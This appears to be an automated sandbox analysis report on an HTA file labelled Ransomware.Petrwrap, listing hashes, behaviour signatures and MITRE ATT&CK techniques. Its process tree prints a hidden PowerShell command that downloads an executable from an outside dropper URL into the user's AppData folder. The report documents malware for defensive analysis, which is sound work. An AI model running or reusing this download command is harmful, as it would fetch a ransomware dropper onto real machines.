f255227fd45316c4681085f39e6da2f509af851f8cc2d2a84ea99c06b935ffe6

Resubmissions

30-06-2024 00:59

240630-bcjr6svbkk 10

20-06-2024 02:02

20-06-2024 01:44

19-06-2024 01:10

18-06-2024 20:40

18-06-2024 13:45

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
18-06-2024 13:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Documents/Ransomware.Petrwrap/Ransomware.Petrwrap/myguy.hta
Size

13KB
MD5

0487382a4daf8eb9660f1c67e30f8b25
SHA1

736752744122a0b5ee4b95ddad634dd225dc0f73
SHA256

ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6
SHA512

e1e7d81d54efd526139ea8ac792ed2035c8e70f040319c0b65f723431d31077c7a6927553890c99151f2354f51c4020ed94e0e2e5d56386c2fc4828e95869106
SSDEEP

192:ScIsmNvaHz65bP/U/njs3NH0Z0UvDVE6Az6XVHBycT6iLMUpJ2seCYHlfeb:SPXTmnjs3BU9A27BNLMUTb

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

5 2108 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2108 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2108 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2108 powershell.exe

flow	pid	process
5	2108	powershell.exe

pid	process
2108	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2108	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2108	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

mshta.exe

description	pid	process	target process
PID 2420 wrote to memory of 2108	2420	mshta.exe	powershell.exe
PID 2420 wrote to memory of 2108	2420	mshta.exe	powershell.exe
PID 2420 wrote to memory of 2108	2420	mshta.exe	powershell.exe
PID 2420 wrote to memory of 2108	2420	mshta.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petrwrap\Ransomware.Petrwrap\myguy.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\35217.exe');
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2108

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads